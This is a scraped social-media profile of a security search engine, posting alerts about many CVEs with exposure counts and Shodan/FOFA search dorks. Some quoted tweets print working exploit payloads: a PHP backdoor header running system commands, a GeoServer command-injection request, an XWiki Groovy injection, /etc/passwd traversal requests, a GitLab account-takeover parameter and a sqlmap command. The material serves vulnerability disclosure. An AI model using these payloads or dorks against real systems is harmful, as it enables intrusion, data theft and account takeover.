Hunter

@HunterMapping

Followers: 15,707
Following: 187
Media: 442
Statuses: 1,300

Internet search engine for security researchers

Joined August 2022
Pinned Tweet
@HunterMapping
Hunter
4 days
🆕🆕JULY SPECIAL!!!! 📊Check out this insightful table revealing the most utilized Webcam services around the world! Stay informed and discover the trends shaping our digital world. You can search for these on USE QUERY product=="" Full
0
3
6
@HunterMapping
Hunter
6 months
🚨Alert🚨New Outlook Exploit Unveiled: CVE-2023-35636 Leads to NTLM v2 Password Breach ⚠️This exploit enables attackers to intercept NTLM v2 hashes, which are used for authentication in Microsoft Windows systems. 📊910k+ Services are found on the
0
221
540
@HunterMapping
Hunter
2 months
🚨Alert🚨CVE-2024-30103: Microsoft Outlook Remote Code Execution Vulnerability ⚠This Microsoft Outlook vulnerability can be circulated from user to user and doesn’t require a click to execute. Rather, execution initiates when an affected email is opened. This is notably dangerous
6
183
422
@HunterMapping
Hunter
2 months
🚨Alert🚨CVE-2024-24919: A path traversal leading to an arbitrary file read! 🔥Deep Research: ⚠It is an arbitrary file read, allowing people to read any file on the system. 📊109K+ Services are found on 🔗Hunter
@johnk3r
Padawan
2 months
Observed several LATAM banks (CL,AR,CO,BR) vulnerable to this!!! Also, IT providers! #csirt #ir #checkpoint CVE-2024-24919 @1ZRR4H
5
64
253
7
126
384
@HunterMapping
Hunter
3 months
🚨Alert🚨CVE-2024-4439: Unauthenticated Stored Cross-Site Scripting Vulnerability in WordPress Core ⚠It can be exploited by both unauthenticated and authenticated users under varying circumstances and be leveraged to inject malicious web scripts into pages. 🤖Affected Versions:
18
118
353
@HunterMapping
Hunter
6 months
🚨Alert🚨CVE-2024-21413 Microsoft Outlook RCE Flaw POC Released 📊219.8K+ Services are found on the 🔗Hunter: Dorks 👇👇👇 Hunter:="Outlook Web App" FOFA: app="Microsoft-Outlook" Shodan:http.component:"outlook
1
113
343
@HunterMapping
Hunter
26 days
🚨Alert🚨CVE-2024-36991: Path Traversal on the “/modules/messaging/“ endpoint in Splunk Enterprise on Windows PoC: 📊257.4K Services are found on 🔗Hunter Link: 👇Search Query Hunter: /product.name="Splunk
13
80
334
@HunterMapping
Hunter
5 months
🚨Alert🚨CVE-2024-21378:Remote Code Execution in Microsoft Outlook ⚠New research has been published on how to discover and exploit the vulnerability️! 📊662K+ Services are found on 🔗Hunter: Dorks 👇👇👇 Hunter:
5
117
305
@HunterMapping
Hunter
1 year
🚨Alert🚨 CVE-2023-2982 # WordPress Social Login and Register authentication bypass 🔥9.8🔥 📎 Dork: "/wp-content/plugins/miniorange-login-openid" Refer to: @LanaCodes #CVE #infosec #vulnerabilities #Security
2
102
305
@HunterMapping
Hunter
2 months
🚨Alert🚨CVE-2024-27348: Unauthenticated users can execute OS commands via Groovy injection in Apache HugeGraph-Server. Upgrade to version 1.3.0 to mitigate. 🔥Python Scanner: 📊200+ Services are found on 🔗Hunter
@adrielsec
elsec
2 months
CVE-2024-27348 (RCE) - Unauth users can execute commands via Groovy injection in Apache HugeGraph-Server. Fix: Upgrade to version 1.3.0 Python Scanner: #bugbounty #bugbountytip #bugbountytips
3
49
243
1
87
305
@HunterMapping
Hunter
1 year
🚨Alert🚨 CVE-2023-3224 Nuxt.js RCE Search Link: Other Dorks: 👉 Shodan:/_nuxt/ 👉 FOFA:body="href=\"/_nuxt/" Thanks to: Refer to: #nuxt #infosec
5
94
287
@HunterMapping
Hunter
4 months
🚨Alert🚨CVE-2024-3400: Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect(CVSS: 10) ⚠It enables an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. 📊 371K+ Services are found on
@shellblues
Kali Yuga Blues
4 months
Public PoC for CVE-2024-3400, tragicomedy in 3 acts:
2
40
193
2
88
291
@HunterMapping
Hunter
4 months
🔥POC
@HunterMapping
Hunter
4 months
🚨Alert🚨CVE-2024-3400: Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect(CVSS: 10) ⚠It enables an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. 📊 371K+ Services are found on
2
88
291
1
98
292
@HunterMapping
Hunter
3 months
🚨Alert🚨CVE-2024-4367/34342: JavaScript Flaws Threaten Millions of PDF.js and React-PDF Users ⚠Designated as CVE-2024-4367 in PDF.js and CVE-2024-34342 in React-PDF, this flaw leads to the execution of unrestricted JavaScript under the hosting domain’s context. 📊50K+ Services
3
83
290
@HunterMapping
Hunter
2 months
🚨Alert🚨CVE-2024-22120 (CVSS 9.1): Zabbix SQLi Vulnerability Exposes IT Infrastructure to Attack 🔥PoC: 🔥PoC: ⚠This time-based SQL injection flaw poses a significant risk to systems running affected Zabbix, potentially allowing
1
86
276
@HunterMapping
Hunter
1 year
🕹️ CVE-2023-25690: Request Smuggling attack on Apache HTTP Server 9.8 rating 🔥 HUNTER Search Dork : Dorks on other platforms: 1⃣Shodan: product:"Apache httpd" version:"2.4.0" 2⃣FOFA: app="APACHE-HTTP_Server" Refer:
7
108
272
@HunterMapping
Hunter
3 months
🚨Alert🚨CVE-2024-34351:Next.js Server-Side Request Forgery in Server Actions 🔥PoC: ⚠A SSRF vulnerability was identified in Next.js Server Actions by security researchers at Assetnote. If the Host header is modified, and the below conditions are also
@infosec_au
shubs
3 months
My colleague @hash_kitten and I discovered a full-read SSRF vulnerability in Next.js (CVE-2024-34351). We published our research today on @assetnote 's blog: . Thank you to the Vercel team for a smooth disclosure process.
17
188
798
2
76
267
@HunterMapping
Hunter
2 months
🚨Alert🚨CVE-2024-23692: Unauthenticated RCE Flaw in Rejetto HTTP File Server 🔥PoC: 📰Refer: ⚠It allows remote attackers to execute arbitrary code on affected servers without authentication, potentially leading to data breaches,
@_mohemiv
Arseniy Sharoglazov
2 months
😲 Stephen Fewer of Rapid7 has shared the POC for my for Unauth RCE in Rejetto HTTP File Server 2.3m! 👉 👉 CVE: CVE-2024-23692 🚨 After an adjustment, RCE can now be achieved via SSRF without modifying the Host header! ⬇️
1
42
117
1
97
260
@HunterMapping
Hunter
1 month
🚨Alert🚨CVE-2024-6387: Remote Unauthenticated Code Execution Vulnerability in OpenSSH server 🔗Hunter Link: 💼Scan Tool @xaitax : ⚠The vulnerability, which is a signal handler race condition in OpenSSH’s server (sshd), allows
0
79
263
@HunterMapping
Hunter
4 months
🚨Alert🚨CVE-2023-50969: Critical Flaw in Imperva SecureSphere WAF Could Lead to Devastating Breaches ⚠ By manipulating the “Content-Encoding” headers in HTTP requests and sending specifically encoded POST data, attackers can effectively slip malicious payloads past the WAF’s
1
83
251
@HunterMapping
Hunter
22 days
🚨Alert🚨CVE-2024-4879&CVE-2024-5217: ServiceNow Security Vulnerabilities Expose Businesses to RCE and Data Breaches 📊62.2K+ Services are found on 🔗Hunter Link: 👇Search Query Hunter:/product.name="ServiceNow" FOFA:
1
84
252
@HunterMapping
Hunter
3 months
🚨Alert🚨CVE-2024-29895(CVSS:10): Critical Command Injection Vulnerabilities in Cacti: 🔥PoC: ⚠This vulnerability can be exploited remotely using the Cacti web interface, allowing an attacker to execute arbitrary commands on the Cacti server.
@chybeta
chybeta
3 months
About CVE-2024-29895 . How to bypass cli_check. in include/cli_check.php: define('CACTI_CLI_ONLY', true); cmd_realtime.php is only accessible via local cli Or it will throw "<strong>This script is only meant to run at the command line.</strong>"
2
10
61
4
86
247
@HunterMapping
Hunter
11 days
🚨Alert🚨CVE-2024-39907 (CVSS 9.8): SQLi Flaw Exposes 1Panel Users to Remote Takeover 🔥PoC: 📊26.3K+ Services are found on 🔗Hunter Link: 👇Search Query Hunter:/product.name="1Panel" FOFA: app="1Panel-Panel"
0
77
251
@HunterMapping
Hunter
2 months
🚨Alert🚨CVE-2024-37079 & CVE-2024-37080 (CVSS scores: 9.8): Multiple heap-overflow vulnerabilities in the implementation of the DCE/RPC protocol! ⚠They could allow a bad actor with network access to vCenter Server to achieve remote code execution by sending a specially crafted
1
98
239
@HunterMapping
Hunter
6 months
🚨Alert🚨CVE-2024-20931 Oracle A RCE vuln based on Weblogic T3\IIOP protocol POC Released 📊10.9K+ Services are found on the 🔗Hunter: Dorks 👇👇👇 Hunter:/product.name="WebLogic Server" FOFA: protocol="WebLogic" Shodan:
1
84
230
@HunterMapping
Hunter
2 months
🚨Alert🚨 CVE-2024-29415: Popular Node.js Package ‘node-ip’ Exposes Millions to Potential SSRF Attacks ⚠Widely-used node-ip npm package, which is designed to retrieve a computer’s IPv4 addresses, has been identified to contain a serious SSRF vulnerability. 📊35.6M+ Services are
2
69
230
@HunterMapping
Hunter
2 months
🚨Alert🚨 CVE-2024-4577: PHP CGI Argument Injection Vulnerability ⚠This oversight allows unauthenticated attackers to bypass the previous protection of CVE-2012-1823 by specific character sequences. Arbitrary code can be executed on remote PHP servers through the argument
0
62
230
@HunterMapping
Hunter
17 days
🚨Alert🚨PHP 8.1.0-dev Backdoor Remote Code Execution 📊22K+ Services are found on the 👇Search Query Hunter: =="PHP" and product.version=="8.1.0" 🔗Hunter Link: 🧙‍♀️Deep Dive:
@grumpzsux
Sergio Medeiros
18 days
Find a server running PHP 8.1.0-dev ❓ 🚨 Check for easy RCE 🚨 👇 Payload: User-Agentt: zerodiumsleep(5); User-Agentt: zerodiumsystem('id'); #bugbountytips #bugbounty #hackthebox #cve #hackernews #cybersecurity
5
62
337
2
77
226
@HunterMapping
Hunter
5 months
🚨Alert🚨CVE-2024-21762: Critical Fortinet FortiOS Out-of-Bound Write SSL VPN Vulnerability ⚠Fortinet released a security advisory for CVE-2024-21762. Bishop Fox analyzed the patch and developed a scanner to quickly determine if an appliance is affected by this vulnerability. 📊
2
69
213
@HunterMapping
Hunter
4 months
🚨Alert🚨CVE-2024-3116: Remote Code Execution (RCE) in pgAdmin version 8.4 or below.(CVSS: 7.4) ⚠This vulnerability allows attackers to execute malicious code on servers running pgAdmin, potentially compromising the entire database system. 📊 1K+ Services are found on
0
59
212
@HunterMapping
Hunter
3 months
🚨Alert🚨CVE-2023-20198: CISCO IOS XE RCE PoC Published by @W01fh4cker 🔥PoC: ⚠Now, hackers across the entire spectrum of skill levels can gain full control over vulnerable routers and switches with shocking ease. 📊204K+ Services are found on
4
74
209
@HunterMapping
Hunter
2 months
🚨Alert🚨CVE-2024-4985 (CVSS 10): Critical Authentication Bypass Flaw Found in GitHub Enterprise Server 🔥PoC: ⚠It could allow attackers to bypass authentication and gain unauthorized access to sensitive code repositories and data. 📊248K+ Services are
@absholi7ly
abdualhadi khalifa
2 months
🔥Poc CVE-2024-4985 #Bypass authentication #GitHub Enterprise Server @HunterMapping @the_yellow_fall @fofabot @Dinosn
2
24
79
3
76
208
@HunterMapping
Hunter
9 months
🚨Alert🚨CVE-2023-46747 F5 BIG-IP Remote Code Execution Vulnerability CVSS score:9.8 Hunter: Dorks 👇👇👇 FOFA app="f5-BIGIP" SHODAN product:"BIG-IP" 📰refer to #infosec #infosecurity #Infosys
3
68
201
@HunterMapping
Hunter
2 months
🚨Alert🚨CVE-2024-28995: High-Severity Directory Traversal Vulnerability affecting SolarWinds Serv-U. 🔥Deep Dive from @rapid7 : ⚠SolarWinds Serv-U was susceptible to a directory traversal vulnerability that would allow access to read sensitive files on
@chybeta
chybeta
2 months
CVE-2024-28995
11
31
431
0
69
201
@HunterMapping
Hunter
16 days
🚨Alert🚨CVE-2024-40725&&CVE-2024-40898, affecting Apache HTTP Server versions 2.4.0 through 2.4.61 📊363.8M+ Services are found on 🔗Hunter Link: 👇Search Query Hunter:/product.name=="Apache" and product.version=="2.4.0" FOFA:
5
72
200
@HunterMapping
Hunter
4 months
🆕🆕🆕Deep dive in !!!!!CVE-2024-29059 📰Leaking ObjRefs to Exploit HTTP .NET Remoting: 📰Leaking and Exploiting ObjRefs via HTTP .NET Remoting 📊 154M+ Services are found on the
0
68
194
@HunterMapping
Hunter
5 months
🚨Alert🚨CVE-2024-1071: WordPress Ultimate Member Plugin is under active attack! ⚠It manifests in versions 2.1.3 to 2.8.2 of the Ultimate Member plugin which can lead to the extraction of sensitive information from the database, including password hashes. 📊 522k+ Services are
3
65
193
@HunterMapping
Hunter
6 months
🚨Alert🚨CVE-2024-23897 (CVSS 9.8): Critical Jenkins Security Vulnerability, RCE Possible ⚠A critical vulnerability within Jenkins’ built-in command line interface (CLI), opens the door to arbitrary file reads through the CLI, potentially culminating in remote code execution
0
56
183
@HunterMapping
Hunter
2 months
CVE-2024-4956: Nexus Repository Flaw PoC:
@HunterMapping
Hunter
2 months
🚨Alert🚨CVE-2024-4956:Nexus Repository Flaw Exposed, Software Supply Chains Threatened ⚠This vulnerability, discovered and responsibly reported by @erickfernandox , could allow attackers to access and download sensitive system files without authentication. 📊284K+ Services are
2
29
86
1
55
178
@HunterMapping
Hunter
5 months
🚨Alert🚨CVE-2024-27497: Replace Your Linksys E2000 Router Now! There’s no fix in sight! ⚠A severe security flaw in the Linksys E2000 router lets hackers waltz right into your network. 📊 300+ Services are found on the 🔗Hunter Link:
3
56
173
@HunterMapping
Hunter
11 months
🚨Alert🚨 CVE-2023-39777 #vBulletin XSS Vulnerability 🧷 Dorks 👇👇👇 FOFA app="vBulletin" Shodan http.html:"content=\"vBulletin" 💐💐💐Credit to @truong_rong #infosec #infosecurity #Infosys
0
45
172
@HunterMapping
Hunter
1 month
🚨Alert🚨CVE-2024-36401 (CVSS 9.8): GeoServer Unauthenticated Remote Code Execution in Evaluating Property Name Expressions 🔥PoC: 📊6.4K+ Services are found on 🔗Hunter Link: 👇Search Query Hunter:
@sirifu4k1
siri@fu4k1
1 month
CVE-2024-36401 POC: GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'touch%20/tmp/success1') HTTP/1.1 Host: your-ip:8080 From: #cve #poc
1
27
129
1
41
177
@HunterMapping
Hunter
2 months
🚨Alert🚨CVE-2024-21683(CVSS 8.3):RCE (Remote Code Execution) in Confluence Data Center and Server ⚠It allows an authenticated attacker to execute arbitrary code which has a high impact on confidentiality, integrity, and availability, and requires no user interaction. 📊1.7M+
1
60
168
@HunterMapping
Hunter
2 months
🚨Alert🚨CVE-2024-30043: Abusing URL Parsing Confusion to Exploit XXE on SharePoint Server And Cloud 🔥PoC: ⚠This XXE injection vulnerability, one of the craziest XXEs that @chudyPB has ever seen, allows you to: ·Read files with SharePoint Farm Service
@chudyPB
Piotr Bazydło
2 months
My SharePoint XXE blog is live. URL scheme confusion allowed to bypass security measures delivered by XmlSecureResolver :)
2
27
94
0
59
169
@HunterMapping
Hunter
5 months
🚨Alert🚨CVE-2024-22245 & 22250: VMware Vulnerabilities Demand Immediate Action ⚠VMware has released an urgent security advisory regarding two critical vulnerabilities within its now-deprecated Enhanced Authentication Plug-in (EAP). 📊 312.7K+ Services are found on the
0
64
157
@HunterMapping
Hunter
3 months
🚨Alert🚨CVE-2024-27956(CVSS 9.9 🔥): A WordPress SQL injection vulnerability in the WP-Automatic plugin ⚠More than 5.5 million attacks in just one month! Attackers can gain unauthorized access to websites and potentially take full control of them. 📊6K+ Services are found on
3
57
153
@HunterMapping
Hunter
19 days
🚨PoC Released on CVE-2024-4879 - Jelly Template Injection Vulnerability in ServiceNow 🔥PoC Github: 🥳Video PoC: 🆕 New Research:
@HunterMapping
Hunter
22 days
🚨Alert🚨CVE-2024-4879&CVE-2024-5217: ServiceNow Security Vulnerabilities Expose Businesses to RCE and Data Breaches 📊62.2K+ Services are found on 🔗Hunter Link: 👇Search Query Hunter:/product.name="ServiceNow" FOFA:
1
84
252
2
58
158
@HunterMapping
Hunter
1 year
🚨Alert🚨 CVE-2023-28121 #WorPress #WooCommerce plugin Unauthorized Admin Access 📎 Dork: /wp-content/plugins/woocommerce-payments/ Path Diffing Analysis, with credit to @MrTuxracer #infosec #vul #bugbountytips #cybersecurity
3
55
153
@HunterMapping
Hunter
4 months
🚨Alert🚨CVE-2024-21677: Atlassian Confluence Path Traversal Vulnerability (CVSS:8.3) ⚠ It allows an unauthenticated attacker to exploit an undefinable vulnerability which has a high impact on confidentiality and requires user interaction. 📊 684K+ Services are found on the
1
39
150
@HunterMapping
Hunter
6 months
🚨CVE-2024-23879🚨 Jenkins RCE POC Released Credit to binganao 🔗 #vulnerability #infosecurity
@HunterMapping
Hunter
6 months
🚨Alert🚨CVE-2024-23897 (CVSS 9.8): Critical Jenkins Security Vulnerability, RCE Possible ⚠A critical vulnerability within Jenkins’ built-in command line interface (CLI), opens the door to arbitrary file reads through the CLI, potentially culminating in remote code execution
0
56
183
2
42
148
@HunterMapping
Hunter
3 months
🚨Alert🚨CVE-2024-29212: Veeam RCE Vulnerability Exposes Data Protection Services to Risk ⚠An attacker could remotely execute malicious code on the VSPC server machine, leading to possible data breaches or disruption of data protection services. 📊177K+ Services are found on
1
49
143
@HunterMapping
Hunter
1 month
🚨Alert🚨CVE-2023-52251, CVE-2024-32030: Remote code execution in UI for Apache Kafka 🔥PoC: ⚠ Kafka UI is affected by two rce vulnerabilities. The first one in the message filtering component leads to execution of arbitrary unsandboxed groovy script. The
1
49
146
@HunterMapping
Hunter
1 year
🚨Alert🚨 CVE-2023-3460 Unpatched #WordPress Ultimate Member Flaw 🔥9.8🔥 📎 Dork: "/wp-content/plugins/um-user-locations/" Refer to: #CVE #infosec #vulnerabilities #Security um-user-locations
4
43
135
@HunterMapping
Hunter
7 months
🚨Alert🚨Atlassian Confluence CVE-2023-22527 RCE Vulnerability In Confluence Data Center and Confluence Server CVSS score:9.0 📊461k+ Services are found Affected version: Atlassian Confluence Data Center and Server 8.0.x/ 8.1.x/8.2.x/8.3.x/8.4.x/8.5.0-8.5.3 🔗Hunter
1
48
140
@HunterMapping
Hunter
3 months
🚨Alert🚨CVE-2024-2961: glibc Vulnerability Opens Door to PHP Attacks ⚠This vulnerability, which allows for out-of-bounds memory writes, could enable remote attackers to execute arbitrary code within the context of vulnerable PHP applications. 📊2.6K+ Services are found on
3
45
140
@HunterMapping
Hunter
1 year
🚨Alert🚨 CVE-2023-3128 #Grafana Account Takeover Vulnerability 🔥 9.4 🔥 📎 Other Dorks: 🫐FOFA app="Grafana" 🍓Shodan product:"Grafana (Open Source)" Refer to: #infosec #vulnerabilities #CVE
@grafana
Grafana
1 year
Today we are releasing Grafana 10.0.1, 9.5.5, 9.4.13, 9.3.16, 9.2.20, and 8.5.27, which include a critical security fix. If you are affected, we recommend that you install newly released versions.
0
15
34
0
45
140
@HunterMapping
Hunter
1 year
🚨Alert🚨 CVE-2023-24243 #CData #vulnerability Search Link: Other Dorks: 💁 Shodan: http.html:"CData Arc" 💁‍♂️ FOFA: body="CData Arc" 💁‍♀️ Censys: services.http.response.body:"CData Arc" Huge shout-out to 🙌🙌🙌 : @d3vc0r3 Refer to
1
33
132
@HunterMapping
Hunter
4 months
🆕🆕🆕 Deep dive into the new RCE in Microsoft Outlook (CVE-2024-21378) from @ptswarm ⚠They've tested the new RCE in Microsoft Outlook (CVE-2024-21378) in a production environment and confirmed it works well! No back connect required! A brief instruction for red teams: 1.
@HunterMapping
Hunter
5 months
🚨Alert🚨CVE-2024-21378:Remote Code Execution in Microsoft Outlook ⚠New research has been published on how to discover and exploit the vulnerability️! 📊662K+ Services are found on 🔗Hunter: Dorks 👇👇👇 Hunter:
5
117
305
0
49
131
@HunterMapping
Hunter
5 months
🚨Alert🚨CVE-2022-0412: Unauthenticated Blind SQL Injection in TI WooCommerce Wishlist WordPress plugin ⚠It is a time-based SQL injection but you can extract databases with just one command. ✈️sqlmap./py -r request./txt --dbs --random-agent --time-sec=12 --level=5 --risk=3
@0x_rood
🇸🇦 ROOD | GOAT
5 months
CVE-2022-0412 is time based sql injection but you can extract databases with this command sqlmap./py -r request./txt --dbs --random-agent --time-sec=12 --level=5 --risk=3 --batch --flush-session #bugbounty #bugbountytips
4
59
243
0
48
132
@HunterMapping
Hunter
4 months
🚨Alert🚨CVE-2024-2879: Critical Security Flaw Found in Popular LayerSlider WordPress Plugin(CVSS: 9.8) ⚠It could be abused to extract sensitive information from databases, such as password hashes. 📊 1.8M+ Services are found on the 🔗Hunter:
2
52
129
@HunterMapping
Hunter
29 days
🚨Alert🚨CVE-2024-34750: Apache Tomcat DoS vulnerability in HTTP/2 connector 📊50.3K+ Services are found on 🔗Hunter Link: 👇Search Query Hunter: web.title="Apache Tomcat/9.0.0"||web.title="Apache Tomcat/10.1.0"||web.title="Apache
4
43
128
@HunterMapping
Hunter
11 days
🥳CALL BACK🥳 CVE-2020-5902 Unauthenticated Remote Code Execution in F5-Big-IP 📊3.2K+ Services are found on 🔥PoC: 🔗Hunter Link: 👇Search Query Hunter:/product.name="BIG-IP Configuration Utility" FOFA:
@coffinxp7
Coffin 
13 days
(Oneliner)CVE-2020-5902 Unauthenticated Remote Code Execution in F5-Big-IP
6
57
351
1
41
128
@HunterMapping
Hunter
1 month
🚨Alert🚨 CVE-2024-29973: Unauthorized command injection in Zyxel NAS devices!! 🔥PoC: ⚠This command injection vulnerability in the “setCookie” parameter in Zyxel NAS326 and NAS542 devices could allow an unauthenticated attacker to execute some OS
@sirifu4k1
siri@fu4k1
1 month
1
20
84
3
50
127
@HunterMapping
Hunter
4 months
🚨Alert🚨CVE-2024-20767: Critical Adobe ColdFusion Flaw Exposes Sensitive Files, PoC Published ⚠ An attacker could bypass security measures, gain unauthorized access to sensitive files and perform arbitrary file system write! 📊 1.1K+ Services are found on the
0
36
126
@HunterMapping
Hunter
1 month
🚨Alert🚨CVE-2024-5655(CVSS 9.6): Run pipelines as any user 🔗Hunter Link: ⚠This flaw allows attackers to trigger pipelines as another user under specific conditions, posing a significant security risk. 📊2.3M+ Services are found on
5
45
126
@HunterMapping
Hunter
10 months
🚨Alert🚨 CVE-2023-36778 #MicrosoftExchangeServer Remote Code Execution Vulnerability 🔗 Dorks 👇👇👇 FOFA app="Outlook-Web-App" Shodan product:"Outlook Web App" 📰Refer to 🔗 #infosec #infosecurity #Infosys
0
52
123
@HunterMapping
Hunter
1 month
🚨Alert🚨CVE-2024-34470: An Unauthenticated Path Traversal vulnerability in HSC Mailinspector 📊180+ Services are found on 🔗Hunter Link: 📰Refer: 👇Query Hunter: web.title=="..:: HSC MailInspector ::.."
@9823f_
tooManyOpenThreats
2 months
CVE-2024-34470 on @fofabot Many vulnerable brazilian servers 🇧🇷 GET /mailinspector/public/loader.php?path=../../../../../../../etc/passwd Query⚙️title=="..:: HSC MailInspector ::.." Link🔗
5
59
245
0
45
122
@HunterMapping
Hunter
7 months
🚨Alert🚨CVE-2023-41056: Redis Remote Code Execution Vulnerability Redis may incorrectly handle resizing of memory buffers which can result in incorrect accounting of buffer sizes and lead to heap overflow and potential remote code execution. 📊 1.4M+ services are found on the
0
41
122
@HunterMapping
Hunter
4 months
🚨Alert🚨CVE-2024-20356: A Command Injection vulnerability in Cisco's CIMC! Jailbreaking a Cisco appliance to run DOOM 🔥PoC: 📰Deep Dive: 📊 3K+ Services are found on 🔗Hunter Link:
0
48
122
@HunterMapping
Hunter
1 year
🚨Alert🚨 CVE-2023-27992 #Zyxel #NAS Critical (9.8🔥) Pre-authentication Command Injection #Vulnerability . Search Link🧷: web.body="res/jquery_api/"&&web.body="{version}" Other Dorks: 👉FOFA body="res/jquery_api/" 👉Shodan http.favicon.hash:943925975
1
40
118
@HunterMapping
Hunter
9 months
🚨Alert🚨CVE-2023-40054 Directory Traversal Remote Code Execution Vulnerability 🔗Hunter: Dorks 👇👇👇 FOFA app="SolarWinds-Network-Management" 📰Refer to #infosec #infosecurity #Infosys #Vulnerability #cybersecurity
0
41
117
@HunterMapping
Hunter
1 month
🚨Alert🚨CVE-2024-31982: XWiki Remote code execution as guest via DatabaseSearch 🔥PoC and Bulk Scanner: ⚠XWiki's database search allows remote code execution through the search text. This allows remote code execution for any visitor of a public wiki or
@sirifu4k1
siri@fu4k1
1 month
CVE-2024-31982:XWiki Remote code execution as guest via DatabaseSearch #RCE #POC %7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20
1
15
86
0
44
118
@HunterMapping
Hunter
1 year
🚨Alert🚨 CVE-2023-34960 #Chamilo #CMS #RCE Search Link: Other Dorks 1⃣️FOFA: body="content=\"Chamilo 1" 2⃣️Shodan: http.component:"Chamilo" Thanks to: @aituglo Refer to: #infosecurity #infosec
3
33
113
@HunterMapping
Hunter
3 months
🚨Alert🚨CVE-2024-4984: XSS on Yoast SEO plugin for WordPress ⚠Any user input inside sprintf() function is vulnerable to XSS, and there is a lot, even the WordPress core itself 📰Refer: 📰GitHub Advisory: 👇👇👇Hunter is currently
@h4x0r_dz
H4x0r.DZ
3 months
CVE-2024-4984: XSS on Yoast SEO plugin for WordPress, any user input inside sprintf() function is vulnerable to XSS, and there is a lot, even the WordPress core itself #infosec #bugbounty #xss
4
26
180
1
34
115
@HunterMapping
Hunter
8 months
🚨Alert🚨CVE-2023-48777 Critical Vulnerability in Elementor Affecting 5+ Million Websites 🔗Hunter: Dorks 👇👇👇 FOFA app="WP-Elementor" SHODAN http.component:"wordpress" 📰Refer to #infosec #infosecurity #Infosys
1
34
112
@HunterMapping
Hunter
3 months
🚨Alert🚨CVE-2023-52424: New WiFi Flaw Leaves All Devices Vulnerable to ‘SSID Confusion’ Attacks ⚠This vulnerability impacts all operating systems and WiFi clients!!!!! This flaw allows attackers to trick victims into connecting to a network with a spoofed SSID (network name),
@top10vpn
Top10VPN
3 months
Today, we published details of a new vulnerability arising from a design flaw in the IEEE 802.11 WiFi standard, identified in collaboration with renowned security expert @vanhoefm . This vulnerability (CVE-2023-52424) impacts all operating systems and WiFi clients. (1/5)
3
118
403
0
43
113
@HunterMapping
Hunter
1 month
🔥PoC Released on CVE-2024-28995: Automated Exploitation of SolarWinds Serv-U Path Traversal & Local File Read 🧐Credit: @StuartBeck11 🔗Learn more here:
@HunterMapping
Hunter
2 months
🚨Alert🚨CVE-2024-28995: High-Severity Directory Traversal Vulnerability affecting SolarWinds Serv-U. 🔥Deep Dive from @rapid7 : ⚠SolarWinds Serv-U was susceptible to a directory traversal vulnerability that would allow access to read sensitive files on
0
69
201
2
36
113
@HunterMapping
Hunter
1 month
🚨Alert🚨CVE-2024-37032: Probllama—Ollama Remote Code Execution Vulnerability 🔥PoC: ⚠The issue relates to a case of insufficient input validation that results in a path traversal flaw. An attacker could exploit to overwrite arbitrary files on the server
@sagitz_
sagitz
1 month
We found a Remote Code Execution (RCE) vulnerability in @Ollama - one of the most popular AI inference projects on GitHub. Here is everything you need to know about #Probllama (CVE-2024-37032) 🧵👇
24
359
2K
1
37
111
@HunterMapping
Hunter
5 months
🚨Hackers exploit Aiohttp bug to find vulnerable networks ⚠CVE-2024-23334 exploitation just requires sending a simple HTTP request to the server with the path to any sensitive file. 📊 For example: `curl -v --path-as-is 'GET' ' http://0.0.0.0:8000/static/../../etc/passwd` 🔗PoC:
@HunterMapping
Hunter
5 months
🚨Alert🚨CVE-2024-23334: Aio-libs aiohttp could allow a remote attacker to send a specially crafted URL request to view arbitrary files, which leads to directory traversal vulnerabilities. 📊 7.8M+ Services are found on 🔗Hunter
3
39
105
0
33
112
@HunterMapping
Hunter
4 months
🚨Alert🚨 CVE-2024-28254/28255: Auth Bypass and SpEL Injection in OpenMetadata lead to a critical RCE (OOB Data Exfiltration). 🔥PoC: 📊 4.9K+ Services are found on 🔗Hunter Link: 👇Query Hunter:
0
40
110
@HunterMapping
Hunter
1 year
🚨Alert🚨 CVE-2023-36934 Yet another critical SQL injection uncovered in #MOVEIt Transfer 💡 Dorks on other platforms: 1⃣Shodan: http.favicon.hash:989289239 2⃣FOFA: icon_hash="989289239" Refer to: #bugbountytips #infosecurity
3
35
105
@HunterMapping
Hunter
5 months
🚨Alert🚨CVE-2024-23334: Aio-libs aiohttp could allow a remote attacker to send a specially crafted URL request to view arbitrary files, which leads to directory traversal vulnerabilities. 📊 7.8M+ Services are found on 🔗Hunter
@W01fh4cker
W01fh4cker
5 months
CVE-2024-23334 Poc for windows: /static/../D:\flag.txt Poc for Linux: /static/../../../../etc/passwd [need to fuzz "../"] #aiohttp #vulnerability
8
97
316
3
39
105
@HunterMapping
Hunter
6 months
🚨Alert🚨CVE-2024-22233: A high-severity Spring Framework Vulnerability ⚠️This vulnerability allows an attacker to provide specially crafted HTTP requests that may cause a denial-of-service (DoS) condition. 📊35k+ Services are found on the
0
40
104
@HunterMapping
Hunter
4 months
🚨Alert🚨CVE-2023-6317~6320: Researchers Discover LG Smart TV Vulnerabilities Allowing Root Access ⚠Multiple vulnerabilities have been disclosed in LG webOS running on its smart televisions that could be exploited to bypass authorization and gain root access on the devices. 📊
0
29
104
@HunterMapping
Hunter
7 months
🚨Alert🚨 CVE-2023-7028&5356 GitLab Addresses Account Takeover & Command Flaws Hunter query: ="Gitlab" 📊1.5m+ results are found worldwide 🔗Hunter: 📰
@rwincey
b0yd
7 months
GitLab CVE-2023-7028 POC user[email][]=valid @email .com&user[email][]=attacker @email .com - PWNED
4
149
662
1
33
100
@HunterMapping
Hunter
1 year
🕹️Alert CVE-2023-29489 0 Day cPanel XSS vulnerability HUNTER Search Link 💡: Dorks on other platforms: 1⃣Shodan: product:cPanel 2⃣FOFA: app="cPanel-MGMT-Products" Refer to: @assetnote @pdnuclei
1
39
101
@HunterMapping
Hunter
1 year
